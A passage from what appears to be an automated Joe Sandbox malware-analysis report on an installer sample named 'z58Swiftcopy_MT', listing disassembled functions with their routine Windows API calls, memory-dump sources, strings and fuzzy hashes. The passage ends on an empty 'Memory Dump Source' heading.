                                                                                                                                                                                                                                      • API String ID: 1451636040-1158693248
                                                                                                                                                                                                                                      • Opcode ID: fd6d30a01278415fece07758d049025ae65b55165fa63b5b41d509ea3c6516ac
                                                                                                                                                                                                                                      • Instruction ID: dd36d9f71d3f98b31449e9fd5fd6fbb92ab2983ffa1af0ce52afe90c4e52f268
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fd6d30a01278415fece07758d049025ae65b55165fa63b5b41d509ea3c6516ac
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B6F03C7150020CFBEF209F61CE0ABAE7769EB44344F00803AFA16B52D0DBB999559F99
                                                                                                                                                                                                                                      Function 100021FA Relevance: 9.1, APIs: 6, Instructions: 137memoryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10002348
                                                                                                                                                                                                                                        • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 100022C5
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022DA
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E9
                                                                                                                                                                                                                                      • CLSIDFromString.OLE32(00000000,00000000), ref: 100022F7
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100022FE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27696729250.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27696679274.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27696753129.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27696776514.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3730416702-0
                                                                                                                                                                                                                                      • Opcode ID: 0f1d2088a070cebd5915530b0a964975e4ea41447dfd67459970790859c4aece
                                                                                                                                                                                                                                      • Instruction ID: a642113aa4013a2ca06c871554e8d399cf46bf4099943ddf9e0960cc50565d32
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f1d2088a070cebd5915530b0a964975e4ea41447dfd67459970790859c4aece
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A941BCB1508311EFF320DF648C84B6AB7E8FF443D0F11892AF946D61A9DB34AA40CB61
                                                                                                                                                                                                                                      Function 00402736 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040278A
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027A6
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 004027E5
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 004027F8
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402810
                                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402824
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2667972263-0
                                                                                                                                                                                                                                      • Opcode ID: 6c7dcdf8261c9d786bb24efcf90e0f1d33b45d541b425cde03fb6c43c6f2b2c7
                                                                                                                                                                                                                                      • Instruction ID: 2027d9f4b10c536beff5d97c30926d1382b99fb2686dd4663458e7dd77d5dad7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6c7dcdf8261c9d786bb24efcf90e0f1d33b45d541b425cde03fb6c43c6f2b2c7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C5219C71800128BBDF216FA5DE49DAE7A79EF05324F14423EF524762E1CA794D418FA8
                                                                                                                                                                                                                                      Function 00404981 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00420D30,00420D30,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,0040489C,000000DF,00000000,00000400,?), ref: 00404A1F
                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00404A27
                                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,00420D30), ref: 00404A3A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                      • String ID: %u.%u%s%s$0B
                                                                                                                                                                                                                                      • API String ID: 3540041739-2032437577
                                                                                                                                                                                                                                      • Opcode ID: 1956ebf24d5e1f55d94ce1980efd0233ee95868cdb52b5f3f7c77d6cead7fe34
                                                                                                                                                                                                                                      • Instruction ID: 454b38ceac9876f8861c3790537a611104b372144c9fccdb064e9295d2f1ba63
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1956ebf24d5e1f55d94ce1980efd0233ee95868cdb52b5f3f7c77d6cead7fe34
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2111E773A0412837DB0066799C45EAF329CDB85374F254637FA26F31D1EA78CC1242E9
                                                                                                                                                                                                                                      Function 00401D95 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDC.USER32(?), ref: 00401D98
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
                                                                                                                                                                                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401DBA
                                                                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401DCB
                                                                                                                                                                                                                                      • CreateFontIndirectA.GDI32(0040B808), ref: 00401E1A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3808545654-0
                                                                                                                                                                                                                                      • Opcode ID: db451da96fda065fe5f02a6a41f4c9c1ff559c50a342c71b5ed450c678e34272
                                                                                                                                                                                                                                      • Instruction ID: bb5471ef097cc8c5e92714fe4b65473af6cf7b7baf5f4d2141323caa5fcdcc79
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db451da96fda065fe5f02a6a41f4c9c1ff559c50a342c71b5ed450c678e34272
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D4014C72944240AFE7006BB5AE5AA997FE8DB55305F10C839F241BA2F2CB7805458FAD
                                                                                                                                                                                                                                      Function 00401D3B Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?), ref: 00401D3F
                                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00401D4C
                                                                                                                                                                                                                                      • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D6D
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D7B
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00401D8A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1849352358-0
                                                                                                                                                                                                                                      • Opcode ID: fc1458dcfc400969bed1c091e5691bcd3d4000c1b62ed4e40ea1ea561ade4028
                                                                                                                                                                                                                                      • Instruction ID: 074f51ed6dd20aae2d42350fdade0312ac008d0ce280de7d9e26dccf07732080
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fc1458dcfc400969bed1c091e5691bcd3d4000c1b62ed4e40ea1ea561ade4028
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 62F0FFB2600515AFDB00EBA4DE88DAFB7BCFB44301B04447AF645F2191CB748D018B38
                                                                                                                                                                                                                                      Function 00401C04 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C74
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C8C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                      • String ID: !
                                                                                                                                                                                                                                      • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                      • Opcode ID: 61d668203e925d2b626f83b6d528d825a590e8d0b5f9acd222ce781ec0ff5e12
                                                                                                                                                                                                                                      • Instruction ID: aed907c05dc833253b389eb1df77c6bfbb772c9e61476b09ce63ef5510084725
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 61d668203e925d2b626f83b6d528d825a590e8d0b5f9acd222ce781ec0ff5e12
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 46218F71A44209AEEB15DFA5D946AED7BB0EF84304F14803EF505F61D1DA7889408F28
                                                                                                                                                                                                                                      Function 00405A31 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004032FA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 00405A37
                                                                                                                                                                                                                                      • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004032FA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 00405A40
                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405A51
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A31
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                      • API String ID: 2659869361-3355392842
                                                                                                                                                                                                                                      • Opcode ID: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
                                                                                                                                                                                                                                      • Instruction ID: 868260c831235620665dea70b18de3ff29fa680cd517475ab4f5cc36a8a73f00
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 79D023726015303AD1127F154C05DCF1A4C8F023507050077F200B7191CB3C0D514BFE
                                                                                                                                                                                                                                      Function 00402BB4 Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C19
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402C22
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402C43
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Close$Enum
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 464197530-0
                                                                                                                                                                                                                                      • Opcode ID: 7700570c92338514809be4fe700ff97aaec082cd166b5f15edfff62a18f3ae9c
                                                                                                                                                                                                                                      • Instruction ID: a71df8347eb47d58d859942eb4958fb6338d9c628d5ecfe9f9dc7c39a89e9901
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7700570c92338514809be4fe700ff97aaec082cd166b5f15edfff62a18f3ae9c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA118832504119BBEF01AF91CF09B9E3B79EB04341F104036BA05B50E0E7B4DE61AA68
                                                                                                                                                                                                                                      Function 00405ACA Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CharNextA.USER32(?,?,C:\,?,00405B36,C:\,C:\,762D3410,?,762D2EE0,00405881,?,762D3410,762D2EE0,00000000), ref: 00405AD8
                                                                                                                                                                                                                                      • CharNextA.USER32(00000000), ref: 00405ADD
                                                                                                                                                                                                                                      • CharNextA.USER32(00000000), ref: 00405AF1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CharNext
                                                                                                                                                                                                                                      • String ID: C:\
                                                                                                                                                                                                                                      • API String ID: 3213498283-3404278061
                                                                                                                                                                                                                                      • Opcode ID: f542051b0c3854551ba559e3fab41aa2c74e08886ad556a296c0d482775cdbba
                                                                                                                                                                                                                                      • Instruction ID: db937687bc36527a3f7147c44c8c9b1a0bf4ed848bee0725310acd997699ac17
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f542051b0c3854551ba559e3fab41aa2c74e08886ad556a296c0d482775cdbba
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8F0C861B14F501AFB2262640C54B776BA8CB99350F04406BD540671C286BC6C404F6A
                                                                                                                                                                                                                                      Function 004037F7 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(000002A8,C:\Users\user\AppData\Local\Temp\,0040362E,?,?,00000006,00000008,0000000A), ref: 00403809
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(000002C8,C:\Users\user\AppData\Local\Temp\,0040362E,?,?,00000006,00000008,0000000A), ref: 0040381D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004037FC
                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\nsb9327.tmp, xrefs: 0040382D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsb9327.tmp
                                                                                                                                                                                                                                      • API String ID: 2962429428-1785074644
                                                                                                                                                                                                                                      • Opcode ID: bc9d59c8f271c216c0b0e312611624ce7a9d5bb861437aa17873a49c6d363409
                                                                                                                                                                                                                                      • Instruction ID: a243388e665e2d569925beaf0092b2dcbae65f1e85c6ca02b15765f08549dd2e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc9d59c8f271c216c0b0e312611624ce7a9d5bb861437aa17873a49c6d363409
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08E04F3250071896C620BF79AE494853B599B41735724C776F138B20F1C73899975AA9
                                                                                                                                                                                                                                      Function 00405134 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 00405163
                                                                                                                                                                                                                                      • CallWindowProcA.USER32(?,?,?,?), ref: 004051B4
                                                                                                                                                                                                                                        • Part of subcall function 004041A6: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004041B8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
